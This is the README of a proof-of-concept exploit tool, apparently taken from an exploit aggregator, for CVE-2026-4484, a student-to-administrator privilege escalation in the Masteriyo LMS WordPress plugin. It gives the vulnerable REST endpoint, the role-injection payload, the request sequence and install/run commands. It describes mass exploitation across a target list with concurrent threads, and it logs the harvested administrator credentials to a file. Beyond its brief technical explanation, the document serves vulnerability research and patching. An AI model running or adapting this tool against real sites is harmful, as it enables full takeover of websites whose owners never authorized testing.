## https://sploitus.com/exploit?id=72443FAE-C59B-5FA4-83C8-DEE3333CC07A
# CVE-2026-4484
Masteriyo LMS <= 2.1.6 - Missing Authorization to Authenticated (Student+) Privilege Escalation to Administrator
---
## ๐ด Vulnerability Overview
### CVE-2026-4484 โ Authenticated Privilege Escalation (Student โ Administrator)
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-4484 |
| **Severity** | **HIGH** โ CVSS v3.1 Score: **8.8** |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Affected Software** | Masteriyo LMS Plugin for WordPress |
| **Affected Versions** | All versions up to and including **2.1.6** |
| **Vulnerability Type** | Privilege Escalation (Role Manipulation) |
| **Authentication Required** | Yes โ Student-level or above |
| **CWE** | CWE-269: Improper Privilege Management |
**Description:**
The **Masteriyo LMS** plugin for WordPress is vulnerable to **Privilege Escalation** in all versions up to, and including, **2.1.6**. The vulnerability originates in the `InstructorsController::prepare_object_for_database` function, which fails to properly restrict role assignment during REST API requests. An authenticated attacker with as little as **Student-level access** can craft a specially formed POST request to the Masteriyo REST API endpoint โ injecting `"roles": ["administrator"]` into the request payload โ to silently elevate their account to WordPress **Administrator**, achieving full site takeover without any administrative interaction.
---
## ๐ ๏ธ Tool Description
This is a **Proof-of-Concept (PoC)** exploitation script targeting WordPress installations running a vulnerable version of the **Masteriyo LMS** plugin. The tool supports two attack modes:
| Mode | Name | Flow | Use Case |
|---|---|---|---|
| **1** | `Nx_1` | Register โ Login โ Escalate โ Verify Admin | Fresh attack โ no existing account needed |
| **2** | `Nx_2` | Login โ Escalate โ Verify Admin | Existing account available (Student/Instructor) |
### Attack Flow
```
[Register / Login as Student]
โ
[Fetch Dashboard Context โ user_id + nonce]
โ
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
โ
[Re-login with fresh session]
โ
[Verify /wp-admin access โ confirmed Administrator]
โ
[Write to Login_admin.txt]
```
---
## ๐ Requirements
### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS
### Python Dependencies
```bash
pip install requests urllib3 colorama
```
Or via requirements file:
```bash
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```
---
## ๐ Installation
```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-4484.py
```
---
## โ๏ธ Usage
### Basic Run
```bash
python3 CVE-2026-4484.py
```
The tool uses an interactive terminal interface โ all parameters are prompted at runtime.
---
### ๐๏ธ Target List Format
Create a plain text file (e.g., `list.txt`) with one target per line:
```
https://target1.com
https://target2.com
http://target3.com/wordpress
```
---
### ๐ฅ Mode 1 โ Nx_1 (Register + Login + Escalate)
Use this mode when you have **no existing account** on the target. The tool registers a new student account automatically, then escalates it.
```
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [user@example.com]: user@example.com
Password to use (Nx_1) [Nx_admin]: Nx_admin123!
```
**Steps performed automatically:**
1. GET `/account/signup/` โ extract registration nonce
2. POST `/st/` โ register new account as Student
3. GET `/account/` โ extract login nonce
4. POST `/wp-admin/admin-ajax.php` โ login via Masteriyo AJAX
5. GET `/account/#/dashboard` โ extract `current_user_id` + `nonce`
6. POST `/wp-json/masteriyo/v1/users/instructors/{id}` with `{"roles":["administrator"]}`
7. Re-login with fresh session โ verify admin panel access
8. Write confirmed hits to `Login_admin.txt`
---
### ๐ฉ Mode 2 โ Nx_2 (Login + Escalate โ Existing Account)
Use this mode when you already have a valid **Student or Instructor** account on the target.
```
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: student@example.com
Password for that user: mypassword
```
**Steps performed automatically:**
1. GET `/account/` โ extract login nonce
2. POST `/wp-admin/admin-ajax.php` โ login via Masteriyo AJAX
3. GET `/account/#/dashboard` โ extract `current_user_id` + `nonce`
4. POST `/wp-json/masteriyo/v1/users/instructors/{id}` with `{"roles":["administrator"]}`
5. Re-login with fresh session โ verify admin panel access
6. Write confirmed hits to `Login_admin.txt`
---
## ๐ Output Files
| File | Description |
|---|---|
| `Login_admin.txt` | All confirmed administrator escalations |
### Output Format
```
https://target.com/wp-login.php user:student@example.com|pass:Nx_admin123!
```
### Sample Terminal Output
```
[OK] https://target.com :: LOGIN OK :: success
[OK] https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK] https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK] https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).
```
---
## ๐ Technical Details
### Vulnerable Endpoint
```
POST /wp-json/masteriyo/v1/users/instructors/{user_id}
```
### Exploit Payload
```json
{
"roles": ["administrator"]
}
```
### Required Headers
```
Content-Type: application/json
X-WP-Nonce:
```
### Root Cause
The `InstructorsController::prepare_object_for_database` function in Masteriyo LMS processes the `roles` parameter from the REST request body without verifying whether the requesting user has the `edit_users` or `promote_users` capability. Any authenticated user (Student-level or above) who can reach this endpoint can submit an arbitrary role value โ including `administrator` โ which is then persisted directly to the WordPress user metadata table.
---
## ๐ก Contact & Author
By: Nxploited (Khaled Alenazi)
---
## โ ๏ธ Legal Disclaimer
> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - โ **Permitted:** Use on systems you own or have been granted explicit written permission to test.
> - โ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.
---
ยฉ 2026 Nxploited (Khaled Alenazi) โ For authorized security research only.